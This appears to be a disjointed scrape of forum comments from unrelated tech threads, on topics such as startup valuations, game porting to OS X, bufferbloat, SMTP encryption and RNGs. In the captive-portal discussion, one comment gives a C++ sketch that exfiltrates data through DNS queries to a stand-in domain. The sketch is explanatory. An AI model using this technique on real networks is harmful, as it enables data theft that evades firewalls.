EMPEROR: Of course I do. It's very good. Of course now and then - just now and then - it gets a touch elaborate.
MOZART: What do you mean, Sire?
EMPEROR: Well, I mean occasionally it seems to have, how shall one say? [he stops in difficulty; turning to Orsini-Rosenberg] How shall one say, Director?
ORSINI-ROSENBERG: Too many notes, Your Majesty?
EMPEROR: Exactly. Very well put. Too many notes.
MOZART: I don't understand. There are just as many notes, Majesty, as are required. Neither more nor less.
EMPEROR: My dear fellow, there are in fact only so many notes the ear can hear in the course of an evening. I think I'm right in saying that, aren't I, Court Composer?
SALIERI: Yes! yes! er, on the whole, yes, Majesty.
MOZART: But this is absurd!
This certainly is an interesting area to explore musically. What could we do with a piano if we had more than ten notes to play at a time? Right now the question is HOW many we can play and still sound musical, judging from the samples I saw.
If you are reading this comment watch this [Black MIDI] Synthesia "Nyan Trololol" | Rainbow Tylenol & Nyan Cat Remix ~ BusiedGem
You are welcome ;)
Not that there is anything wrong with noise. As a fan of CCCC (Mayuko Hino), I have often thought noise is best when it is played directly (analog), instead of the digital perfection of MIDI. I like my digital noise when it's written in Forth.
http://pelulamu.net/ibniz/ (warning: turn down the volume - raw square waves at the beginning!)
I've been legitimately impressed by the abilities of certain artists to really push the boundaries and limits - in my opinion - of packing in musicality in the D&B platform. One I can point to would be Camo & Krooked. Another that sort of crosses into bass music would be Knife Party. What they have in common, to my ears, is that they're able to embrace the full spectrum of available sounds. High peaks and really, really deep bass. Then, with so much digital control, they can go up and down, place certain sounds in certain tonal areas...it's just amazing to me.
One of the things that infuriates me about music commentary is the tired refrain of "rock is dead" or "music isn't original anymore" because, frankly, they're not true. Rock continues to be a broad genre, and I really see electronic-production tunes like Skrillex as an extension of rock and metal, in that it appeals to a (predominantly) younger audience and is very abrasive to 'traditional' ears.
Music is really going through a metamorphosis of innovation thanks to software like Ableton and the numerous brilliant synths out there. It's one thing to say "I don't like that music" but it's completely dishonest to say nothing's original anymore. Yes, there will always be 'trend jumpers' and some formulaic stuff (that goes for all genres, and specifically anything Max Martin touches), but now and then, BAM. Something shows up and moves the needle.
 Camo & Krooked - Let's Get Dirty - https://www.youtube.com/watch?v=IL5H38bpvFA
 Knife Party - Resistance - https://www.youtube.com/watch?v=DwqUGkR9yh8
(To clarify - I feel the clip from Amadeus is somewhat amusing in this context, but to those who critique black MIDI as music: I don't think it really is music ... it's art.)
A gold rush for good startups I think.
The returns from sitting the right group of people in a room and getting them to make something a few orders of magnitude better than it was before are still going to be huge.
My point is that arguing that people have said this bubble was about to burst and that it hasn't yet isn't an argument that it won't.
Pegasus (n) 1. Mythical winged horse; 2. Silicon Valley 'unicorn' with high gross margin. i.e. one that might actually take off.
To be fair, I think these markdowns have more to do with who is investing than the companies themselves.
VCs do portfolio valuations much less frequently than mutual funds, PE firms, or hedge funds do, and they give the valuations less negative scrutiny than the aforementioned firms do. The reason for this....
... is that VC firms typically don't allow redemptions at monthly intervals, which means they can keep an unrealistic valuation for longer, whereas hedge funds, PE firms, and mutual funds, which typically allow monthly redemptions, need to properly value each holding at the end of each month.
I mean, if you are a VC, do you care if you don't write down Snapchat at the end of the month? You really have no incentive to do so.
You get paid quarterly based on the size of your portfolio, so why mark it down until you are absolutely certain it needs to be marked down? That point usually doesn't come until you actually go to sell, be it an IPO or a private equity deal.
However, if you are a hedge fund and someone wants to redeem their assets, you want to make sure you value Snapchat at what you can realistically sell it for, as that's essentially what you are doing when you allow someone to redeem their funds from your firm.
With people pulling money out of hedge funds and PE firms on a monthly basis, you have to pay attention to valuations on a much more granular time frame than VC firms historically would have.
>To summarize: there does not appear to be a tech bubble in the public markets. There does not appear to be a bubble in early or mid stages of the private markets. There does appear to be a bubble in the late-stage private companies, but that's because people are misunderstanding these financial instruments as equity. If you reclassify those rounds as debt, then it gets hard to say where exactly the bubble is.
>At some point, I expect LPs to realize that buying debt in late-stage tech companies is not what they signed up for, and then prices in late-stage private companies will appear to correct. And I think that the entire public market is likely to go down, perhaps substantially, when interest rates materially move up, though that may be a long time away. But I expect public tech companies are likely to trade with the rest of the market and not underperform.
Also, the decaying state of physical infrastructure in the U.S. is only going to drive more people to spend time on the Internet, where network effects are only getting exponentially more powerful as new networks are built on top of existing networks. These days a social startup that's "only growing as fast as Facebook" might not even be able to successfully raise a seed round. There might be a cyclical downturn, but none of the underlying trends in society point to tech being a bad investment over the long term.
So what we're seeing is that people are starting to re-think valuations in the face of these preferences.
The current state of highly educated people looking for get-rich-quick schemes (unicorns) is tiresome.
Next up: The next [pick top product] killer! You won't believe how [pick new or underdog product] is going to completely replace [pick top product] due to its [pick random feature of [pick new or underdog product]]
Captive portals these days also block ICMP.
Most firewalls block ICMP these days, because the days of blacklisting are over and ICMP is not the one getting whitelisted. Why?
The only way these days is to misuse DNS. But even that works less and less reliably.
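For the unfamiliar, the trick is that even a locked-down network usually forwards DNS lookups upstream, so data can ride along in the queried name. A minimal hedged sketch (the domain exfil.example and the hex encoding are made up for illustration; real tunnels like iodine pack far more per query):

    // Sketch: smuggling bytes out through DNS. The firewall never sees
    // our traffic directly - the local resolver forwards the query
    // upstream for us, and the payload rides in the queried name.
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <cstdio>

    int main() {
        // Hex-encode "hi" (0x68 0x69) into a label; the authoritative
        // server for exfil.example decodes and logs it on the far side.
        const char *qname = "6869.exfil.example";

        addrinfo hints{}, *res = nullptr;
        hints.ai_family = AF_INET;
        hints.ai_socktype = SOCK_STREAM;

        // The answer is irrelevant; the query itself carried the data.
        int rc = getaddrinfo(qname, nullptr, &hints, &res);
        std::printf("lookup returned %d\n", rc);
        if (res) freeaddrinfo(res);
        return 0;
    }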
Is there any way to stop things like this at the corporate firewall?
Apart from the problems with Windows, npm, and path lengths.
It's been changed now, but originally was titled "10 Habits of a Happy Node Hacker (2016)"
The problem now is that there is JUST SO MUCH metadata that it is losing that distinction. If someone calls a known pot dealer once a week, then it doesn't matter whether you hear the call or not, you can still infer that the caller picks up every week.
A DOJ lawyer once said to me that "when surveillance is ubiquitous, the role of law enforcement becomes the role of a prison warden, where everyone is an infraction waiting to happen."
The reason it's not a bigger issue right now isn't that "nobody cares, privacy is dead!" It's that people for the most part do not understand the mechanism.
Explain to ordinary people exactly how ads track them; just how many do you suppose will approve of and be comfortable with the arrangement?
The entire industry is built on sand.
"Of the 30 chapters of the TPP, there are only 6 that have to do with traditional trade issues the rest have to do with "behind the border" policies, which are basically our laws In the text, we see an expansion of the failed model, under NAFTA, that pits US workers against workers in other countries, this time in Vietnam where workers earn 65 cents an hour, as well as other countries such as Malaysia which has a huge problem with human trafficking modern-day slavery we are very concerned that this continues that race to the bottom it leads to an overall depression of wages and an increase of income inequality in the U.S.
It's a trade of industries: we are going to favor our pharmaceutical manufacturers, certain content producers receive favorable status while giving up other industries."
If only we could fashion trade agreements to lift all boats, removing tariffs only when the production of a product is ecological and societally sustainable.
What came out of that, it appears to me, is a booming software industry with more competent and confident local software engineers.
I am for reaching a global economic optimum.
I think this already sort of exists somewhat. If my close relatives manufacture something, I gladly buy their goods over those of their competitors, because yes, I am paying more, but the money is supporting my uncles, nephews and nieces. I think that's a net positive for me. They reciprocate the favour. As a family we are wealthier than we would be otherwise because, no, they cannot abandon their business and start new businesses just to exploit comparative advantage. That is unrealistic. They know only one market well enough and do not have the resources or guidance to get into a completely different market.
I guess the Amish are another example of this, and I believe Israel's kibbutzim as well.
Protectionism and "Buy American" is fundamentally incompatible with affordable consumer goods. Hoffa's way will lead to you only being able to afford a new smartphone once every 20 years. Televisions will become family heirlooms because you just can't afford to buy a new one. Hope you like the outfit you're planning on buying, because you're going to be wearing it for years.
I value the modern American lifestyle.
Back in the day I did most of my dev work on Solaris. I then spent 4 years as CTO at a startup that was pretty much only Windows.
When I subsequently went back to working at a unix shop I was initially struggling with vi as I tried to read some of the C++ code. I couldn't remember commands, was having to refer to the man pages every few mins. It was torture.
A couple of days in, I was writing up some notes in vi when someone walked past my desk and started chatting. When we finished talking I looked down at the monitor and I'd written more than I had when I was concentrating, nicely formatted, the works. Turns out "my hands" had remembered a load of what I thought I had forgotten.
For the next few days I had to keep finding ways to distract myself so that I could work efficiently. Eventually it all came to the foreground but it was the most bizarre experience while it was happening.
Once he starts working on the Linux port he'll regret that. Every developer who starts with their own platform-specific code ends up using SDL2 anyway. Don't make that mistake.
I wish the author had told me more about it than just this. Can somebody comment on how it compares to recent VS editions these days? About 5 years ago I also looked into using OS X as my main OS. As I've always been using non-command-line graphical text editors and IDEs for most coding, that made Xcode the go-to environment, but I just couldn't deal with it even though I tried. I don't remember all the details, but in general it just felt inferior to VS on pretty much all fronts, with no advantages of any kind (for C++). Again, IIRC, it did annoying things like opening the same document in multiple windows, one for editing and one for debugging or so? Anyway, what's the state today?
Anyway, I don't really care anymore; I bought a ThinkPad instead. Cocoa is just something I can't even.
My experience has been pretty different. I'm not a professional developer though.
OpenGL on multiple monitors - this was much more difficult to do on MacOS. I had to create a separate window for each monitor, create a rendering context for each window, make sure my graphics code was issuing the drawing commands to the proper context, then have each context queue/batch "pending" rendering commands and issue them all at once at the end of a frame on a by-context basis. Whereas on Windows you can pretty much create a window that spans multiple monitors and draw to it with a single rendering context.
Input - I used DirectInput on Windows and wrangled a suitable implementation using HID Utilities on Mac, which was not easy given my lack of previous USB programming experience. A major annoyance was the lack of a device "guid" that you can get via HID Utilities to uniquely identify an input device - I had to manually construct one using (among other things) the USB port # that the device was plugged into. Not ideal.
SSE intrinsics - my experience was that Microsoft's compiler was MUCH better at generating code from SSE/SSE2 intrinsics than clang - my Windows SSE-optimized functions ran significantly faster than my "pure" C++ implementations, whereas the Mac versions ran a bit slower! My next thought was to take this particular bit of codegen responsibility away from clang and write inline assembly versions of these functions, but I took a look at the clang inline assembly syntax and decided to skip that effort. (I did write an inline assembly version using the MS syntax and squeezed an additional 15% perf over the MS intrinsic code. A toy sketch of what such intrinsic code looks like follows below.)
Pretty much everything else (porting audio from DirectSound to OpenAL, issuing HTTP requests, kludging up a GUI, etc.) was pretty straightforward / did not have any nasty surprises.
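On the SSE point above, for readers who haven't touched intrinsics: this is the general shape of such code. A toy sketch, not the poster's actual functions, assuming 16-byte-aligned buffers and a length divisible by 4:

    // Add two float arrays four lanes at a time with SSE intrinsics.
    #include <emmintrin.h>

    void add_floats_sse(const float *a, const float *b, float *out, int n) {
        for (int i = 0; i < n; i += 4) {
            __m128 va = _mm_load_ps(a + i);            // aligned load of 4 floats
            __m128 vb = _mm_load_ps(b + i);
            _mm_store_ps(out + i, _mm_add_ps(va, vb)); // 4 adds in one instruction
        }
    }

How well a given compiler schedules the resulting loads, adds, and stores is exactly where the MSVC-vs-clang gap described above would show up.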
What can make such a considerable difference?
It took two weeks to get the code compiling and running. That turned out to be the easy part. Getting the application performing well, feeling "native", and getting the bug count down took another six months.
I love Banished and I'd like to see a completed OS X port. But I'm not expecting this to be done, like, tomorrow!
Not just unix-like, OS X is certified UNIX.
OpenGL on OS X is still behind the times, and so far it's not even clear if Apple will add Vulkan support when it comes out.
To this day I still don't see how it is useful.
The code that is completely different on the platforms is stuff like HTTPS requests, open file dialog, create/delete folders.
Did the author buy a MacBook Pro just for this purpose? I'd assume this is his personal laptop, but his "Using a Mac" section sounds like he's not a Mac user even in his free time.
First make the iOS version. Then, port it over to Java. Then, port it over to C# or maybe ActionScript3/Flash.
This way, I can recursively update previous versions as the 'best solution' to interesting problems becomes clear by the end of the 2nd or 3rd port. This gives the Objective-C/iOS version the attention it needs, and I can use the rapid application development features for each new port.
Most of these had to do with templates that expected the code inside them not to be compiled until they were instantiated. The Microsoft compiler has that behavior, while clang does not.
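A minimal hypothetical example of that difference (not from the actual codebase): older MSVC parsed template bodies only at instantiation time, while clang performs two-phase lookup up front, so clang rejects this file immediately.

    template <typename T>
    void broken() {
        undeclared_function();  // clang: error right here, since the call is
                                // not dependent on T; old MSVC: accepted,
                                // because the body is only checked when the
                                // template is instantiated
    }
    // No broken<...>() call anywhere, so MSVC never looks inside the body.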
Where would one have to hide to retain this level of ignorance for so long?
QUIC uses fundamentally the same basic congestion avoidance algorithm as TCP (QUIC's algorithm is a work in progress, AFAIK), so even QUIC is still in the same bloat.
The problem eventually bubbles up the stack and affects most web applications, so that a single user, just using a web application on one machine, can break the Internet for all other users on the same LAN.
Try this demo for yourself:
1. Run "ping google.com" from another computer on your LAN.
2. Upload a 10-20MB file via Gmail or Dropbox from your computer.
3. Watch the ping times on the other computer skyrocket from around 100ms to upwards of 5-10 seconds.
4. Try a Google search from any other computer on your LAN while this is happening.
Web applications that use protocols such as WebSockets have no way to reduce the bufferbloat footprint of their application, other than re-implementing their own delay-sensitive congestion avoidance algorithm on top. And actually, if you want to build a robust application that does any uploading (or plenty of downloading), this is what you need to do.
For example, to prevent inducing bufferbloat, Apple's software update actually uses a variant of LEDBAT (the delay sensitive congestion avoidance algorithm from BitTorrent's protocol) when downloading software updates.
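The heart of LEDBAT is just a delay-proportional window update: grow the window while measured queueing delay stays under a target, shrink it as delay approaches or exceeds that target, so bulk transfers yield to interactive traffic. A hedged sketch using RFC 6817's suggested constants (not a claim about Apple's actual parameters):

    // One LEDBAT-style congestion window update per acknowledgement.
    double ledbat_update(double cwnd_bytes, double queueing_delay_s,
                         double bytes_acked) {
        const double TARGET = 0.100;  // 100 ms max added queueing delay
        const double GAIN   = 1.0;    // at most one MSS of growth per RTT
        const double MSS    = 1448.0; // typical Ethernet payload, in bytes

        // Positive while under target (grow), negative when over (shrink).
        double off_target = (TARGET - queueing_delay_s) / TARGET;
        cwnd_bytes += GAIN * off_target * bytes_acked * MSS / cwnd_bytes;
        return cwnd_bytes < 2 * MSS ? 2 * MSS : cwnd_bytes;  // keep a floor
    }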
In my spare time I'm a contact juggler. If you don't know what that is, it involves rolling balls around the body. David Bowie in Labyrinth is usually a good reference point.
And I'm good at it. I'm good at it because I've been doing it for nearly a decade and I've put in the hours. I don't think I learned particularly quickly, or even particularly well, but I stuck with it and worked hard to improve. I'm not shy about telling people that, but many still seem to assume it's some form of innate talent, no matter how much I reassure them otherwise.
It's as though people would rather accept their own status quos rather than believe that effort and commitment is enough to improve their lot. Yes, it might take years to reach a level of skill in a given discipline, but those years will pass anyway. Wouldn't it be nice to have something more to show for all that time than a depression on the sofa in front of the tv?
I have no CS degree but have elbowed my way (often with a distinct lack of grace, in retrospect) into the industry as a software developer. I now somehow work at a place that prides itself on intense meritocracy, famous for its grueling elitist interviews .... and the impostor syndrome is intense. But when I look around, most of the people around me do not seem so much 'more intelligent' as 'more adapted for the school-grades / work-politics system' which the interview process / promo process selects for.
To me, intelligence and smartness are clearly cultural phenomena. Yes, some people are more adapted to certain types of intellectual activity, but whether those things are 'smart' or not is questionable to me.
As a parent I often get frustrated with myself when I instinctually reward my children with comments like "you're so smart". Unfortunately they struggle with focusing, behavioural compliance, etc. in similar ways to me, while their intellectual and artistic curiosity is intense -- I know they have a long uphill battle ahead of them.
The older I get, the wiser I get, the more I believe in the above statement. As in, not having the mental capacity or brain-power to muse over inequities, both in personal and worldly topics, is a less emotionally taxing position to be in. I grew up in a protestant Christian faith, and while I don't actively participate, I do reflect often on some of the teachings (mostly the Beatitudes) and literature, and only in my 20s did I realize that eating the apple from the tree of knowledge is pretty much a metaphor for our evolutionary development into consciousness, of "knowing right and wrong" as a species.
Intelligence? It's a curse as much as it is a blessing. Folks can disagree with that assertion if they'd like. From my personal studies in literature and philosophy, though, I think it's a pretty common understanding amongst a certain tier of thinkers. My apologies if I come off sounding a little elitist, but intelligence is a bell curve, and, to quote the famous Demotivational poster, "Not everybody gets to be an astronaut when they grow up."
Link to photo I found via Google search: http://cdn.shopify.com/s/files/1/0535/6917/products/potentia...
It's a #1 best-seller on Amazon: http://www.amazon.co.uk/Outliers-Story-Success-Malcolm-Gladw...
Then there is also impostor syndrome; many students are likely to feel not smart enough.
And then there is the cultural taboo around smartness. Taking pride in one's ability is socially accepted as long as that ability is not intellectual. So in a way an idea like this turns into twisted logic: "I'm smart; my laziness in college shows it." And now you get to do that sweet guilt-tripping for feeling too smart. There is a difference between pride and arrogance, so this self-deprecation seems a bit needless.
What if we don't consider pride a sin, but a natural phenomenon within the range of human emotion? Maybe pride is inevitable for the ego. Now, if that is true, what should a good student be proud of? What if being openly proud of your intellect is healthy after all?
On the other hand I also have heard from many that grad school is the first time many students have to see a therapist and deal with depression.
I like the analogy that things are "muscles". It concisely captures various phenomena that I've observed: the brain is a muscle, willpower is a muscle, trust (in another person) is a muscle ...
This seems like such an empowering way to look at learning, and one I think many of us are prone to forget. Even masters don't just arrive at their talent, they too have to work at it, over and over, day after day.
It seems timezones matter a lot. :)
People talking about budgets and fiscal planning while borrowing the vocabulary of hi-tech, bio-tech, etc. Anything which passively indicates that they are up to date on the cant and argot of totally unrelated fields, but serves as a signal of being at the edge or on the cusp of all things new and modern and professional.
Examples: using MM for millions, or K for thousands (is that metric K or computing K?), or saying "spend" as a noun. Having to sound like one knows and is up to date with all the different industry terminologies must be taxing.
Best of all is when a person is actually familiar with the terminology and senses the forced nature of the out-of-context use. They can only smile at the stilted usage.
It's a lot of text in comparison to the original poster-comic and a lot of stuff seems very repetitive (it's bound to be, right?) since many principles of planes, submarines, rockets are the same (physics). Still a fun read if you don't plow through it in one sitting.
Edit: He's taken the common word list and added different forms as he needed them. Go -> goer and goers, because he wanted to use them. Grow is allowed, but grower and growers are not, because he didn't need them.
Unless they have some game-changing wireless technology, I don't see it happening, and investors may as well put their money down a black hole.
BI says "Part of his plan involves installing microcells in customer's homes to blanket the nation, but also making it as easy as buying a cellphone to sign up for it. Another key to the plan is a portfolio of zero-rated apps that won't cut into your data, Palihapitiya said."
^That does not sound like a very good plan. Carriers like AT&T and T-Mobile already have microcell options, and most people won't opt for one, especially if other people get to use the microcell at the cost of the owner's personal bandwidth with their ISP.
What are zero-rated apps? Isn't that similar to what T-Mobile is already doing with their video and audio streaming: whitelisting apps that will not count against data? Most carriers also have WiFi calling.
That auction he wants to participate in, isn't that for low-band spectrum like 600MHz? That is good for extending coverage but will not increase your download speeds. Carriers like to have both low band and high band.
Best of luck, Chamath.
But it would hardly help him "overtake" AT&T and Verizon with no network and probably only 10-20MHz of spectrum, possibly missing large markets like New York and San Francisco entirely due to the high price licenses in those markets fetch.
The auction is generally seen as most beneficial to T-Mobile who has a network, but lacks low-frequency spectrum in a lot of markets.
There have been many companies that have dreamed of entering the US wireless business. Many have bought spectrum only to let it languish for years and then sell it to an incumbent carrier. Looking at 700MHz-A licenses, a lot of them are owned by companies such as "C700-Salt Lake City-A LLC", "C700-Jacksonville-A LLC", "Cavalier Louisville, LLC", and "Cavalier Albany NY, LLC". Part of the issue is that it is expensive to build out a wireless carrier requiring lots of money and consumers demand a high level of perfection when it comes to their wireless carriers. The American market isn't one that tolerates even small carrier issues.
Some of it will depend on what licenses go for. I think most people are expecting licenses to run T-Mobile in the range of a couple billion given the 30MHz set aside, but T-Mobile is planning for up to $10B. Verizon just paid around $10B for around 10MHz of AWS-3 spectrum and the 600MHz licenses are a lot more valuable. But 30MHz is set aside with less competition from the big two.
Given that the licenses will likely cost $2B+ and cap-ex can often run $3-8B per year for carriers, $4-10B seems a little low to launch a compelling service. Part of the issue with the US is that it's such an expansive place and people don't want to be told "this service is only available in Maryland, DC, and Northern Virginia".
I guess the question is: what does he think he can do better. If it's cost, I can get 2-5GB of data with unlimited talk and text from Boost for $30/mo, taxes and fees included, on Sprint's nationwide network. His network will be worse than Sprint's so how much of a discount can he offer off $30 to make a much worse, completely new network compelling? He won't have loads of spectrum to offer really high data caps. And if he starts offering 100GB for $25, that will have to come down fast as people start actually using it and the network becomes capacity constrained. And customers are very used to being grandfathered into plans in wireless. If he were just competing against AT&T and Verizon, he might have an opening. But even AT&T has their Cricket brand where I can get 2.5GB for $35, taxes and fees included, on AT&T's network.
The question is: what does his entry bring to the scene? It seems unlikely that he can greatly undercut prices. It seems unlikely that microcells in people's homes will "blanket the nation". With so little spectrum compared to competitors, he won't be able to offer the speed and capacity they're offering. Without a reliable network, customers will want a steep discount to move to his service. So, how much below $30/mo can he go to grab customers? Is there something else compelling? T-Mobile already offers microcells for your home and zero-rates music and now video streaming.
I'm all for increasing competition. It just seems unlikely that this will increase competition. It seems way more likely that Dish will buy some 600MHz licenses and start rolling out a network. They already have substantial spectrum holdings and the low-frequency licenses would allow them to get broad coverage without spending too much while using their higher-frequency spectrum to supplement capacity where needed. Dish also seems to think that wireless data is going to be their salvation. As we inch closer to 5G, it's likely that fixed mobile broadband from an antenna in your home could serve as competition to wired internet services. That would allow Dish to offer on-demand services and home broadband plus mobile services in an era when more people are forgoing pay-TV services.
To me, that seems like something with a strong chance of happening. The company already has a huge spectrum investment and they need wireless for their future. Rama would be competing with way less spectrum and starting from scratch. Seems like a much easier way to be profitable would be to bid on the spectrum that AT&T and Verizon can't bid on, use the big FCC discounts for new players, hold it for 4-5 years, and then re-sell it for a profit.
I own a tiny bit of common stock in a private company (by way of ESOs), and I have a hunch that virtually all of the rest of the stock is in preferred shares of some sort. And thus I have no idea how much my stake is worth. For all I know, it's zero.
Shouldn't it count as some sort of securities/financial fraud to issue preferred shares of stock, and then to hawk the "market valuation" of the company as if you'd just sold common stock for the same terms?
"The caterpillar, instead of building its cocoon to guard itself at night, wraps it around the larval wasps (which previously tore their way out of its body), and will continue to defend them until it starves to death.
The biggest danger for these parasitic wasps is being injected with another species of parasitic wasp".
EDIT: Wow, what a cool site - crowdfunding experiments!
It seems surprising that this entire project was done with $4,500 of crowdfunding. That seems very cheap. I wonder how much of the project funding came from elsewhere.
More info: https://en.m.wikipedia.org/wiki/Leucochloridium_paradoxum
I didn't know this platform existed.
P.S: It's just a joke!
They must have better optimizations for running in production, such as in-place operations.
The responses seem to show that the way you implement things can make a big difference in runtime. Perhaps the scripts used for benchmarking can be further optimized?
That said, the lack of in-place operations might be surprising (although it has been said that they are coming)
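For readers unfamiliar with the term, a generic illustration of why in-place operations matter in production, not tied to the library being benchmarked here:

    // Out-of-place vs. in-place scaling of a buffer.
    #include <cstddef>
    #include <vector>

    // Out of place: returns y = k * x, paying for a fresh allocation
    // (and the accompanying memory traffic) on every call.
    std::vector<float> scale(const std::vector<float>& x, float k) {
        std::vector<float> y(x.size());              // allocation per call
        for (std::size_t i = 0; i < x.size(); ++i) y[i] = k * x[i];
        return y;
    }

    // In place: x *= k. No allocation, better cache behavior; this is
    // what tight production loops want.
    void scale_inplace(std::vector<float>& x, float k) {
        for (float& v : x) v *= k;
    }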
Regarding the issue with certificates for the servers that the MX points to, I disagree with the author. If the MX for example.com points to mail.example.info, it implies that example.com is trusting the handling of its mail to mail.example.info; therefore there is no issue with letting mail.example.info present its own certificate.
The article also suggests that DNSSEC with DANE will solve all issues with SMTP encryption.
However, DNSSEC is a crappy standard. It doesn't do encryption, so a surveillant can still collect metadata; it has unsolved issues that facilitate amplification attacks; it's overly complex; and adoption has been slow. In fact, before DANE arrived on the scene, there was hardly a good reason to deploy it.
If we adopt DNSSEC now we'll be stuck with it (including its lack of privacy) pretty much forever. Instead, I suggest we work on more promising initiatives such as DNSCurve (https://en.wikipedia.org/wiki/DNSCurve)
* TLS Wrapper
* Secure Tunnel
And Amazon Web Services Simple Email Service accepts all three approaches. Granted, the latter two may not be supported by a lot of providers, but hey, isn't that the same situation as with browser security? We deprecate old MTAs and old versions of them progressively. Just my two cents.
I predict that within my group of friends I could receive/send from/to almost everyone if I enforced TLS on my server. Except to/from that one guy who is savvy enough to have his own domain but hosts his email at a cheap, crappy provider.
PGP and S/MIME are perfectly fine for high-security scenarios (whistleblowing and such), in other words for the 0.000001% use case.
For the 99.9% use case, all that regular folks need is for the sending MX to verify that the recipient MX owns the domain before delivery.
PGP and S/MIME, with their key-signing parties, government-owned PKI, et cetera, are either wild overkill or so utterly complex that they defeat the purpose for the 99.9% use case.
That said, you are going to break some of my software with this.
Specifically, an SMTP reverse proxy that looks at the domain part of RCPT TO and transparently forwards the SMTP connection to the correct customer's MX for processing.
It could easily be unbroken again - BUT that would require that Postfix get their software together and add SNI support to their TLS stack (like all? other MX software does).
1) Use RCPT domain-part for the SNI hostname.
2) Always try SMTPS port before SMTP port. Always try STARTTLS before plaintext.
3) Actually verify the certificate, duh.
4) Support a new EHLO header that mimics Strict-Transport-Security exactly.
I'm finding it quite difficult to read through the main page, however, as there's something going on with the scrolling. It's hyper-sensitive, and when there are animations on the page they play through before jumping me really far ahead.
And: The service looks nice - my way of asking questions does not imply a bad impression.
But the difference with Sodocan is that it then sends these JSON files to an API server, which hosts the documentation?
So basically instead of using JSDoc + static site generator, one would use this method?
And the benefit would be that the generated documentation would be crowdsourced?
Am I the only one who cannot believe that websites made by (web) developers use scroll hijacking?
So along that line, the massive recent increase in high-sugar food/drinks and fast-food restaurants like McDonald's should be fueling another leap in brain size!
Not mentioning the speed variability of the ChaCha family is a flaw in the analysis.
Also, does anyone know if PCG is in use somewhere today?
> No facility for a user-provided seed, preventing programs from getting reproducible results
> Periodically stirs the generator using kernel-provided entropy; this code must be removed if reproducible results desired (in testing its speed, I deleted this code)
seem like exactly the kinds of foot guns you really want removed from an RNG you're using for real live code.
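For contrast, the PCG side of the comparison is seedable and reproducible by design, which is exactly the property the quoted implementation strips out. This is a close transcription of O'Neill's minimal pcg32 generator:

    // Minimal seedable PCG32 (LCG state advance + permuted output).
    #include <cstdint>

    struct Pcg32 {
        std::uint64_t state = 0, inc = 0;
        Pcg32(std::uint64_t seed, std::uint64_t stream) {
            inc = (stream << 1u) | 1u;  // stream selector must be odd
            next();
            state += seed;
            next();
        }
        std::uint32_t next() {
            std::uint64_t old = state;
            state = old * 6364136223846793005ULL + inc;
            std::uint32_t xs =
                static_cast<std::uint32_t>(((old >> 18u) ^ old) >> 27u);
            std::uint32_t rot = static_cast<std::uint32_t>(old >> 59u);
            return (xs >> rot) | (xs << ((32u - rot) & 31u));  // rotate right
        }
    };

Same seed and stream give the same sequence on every run, which is precisely what a kernel-stirred RNG deliberately refuses to provide.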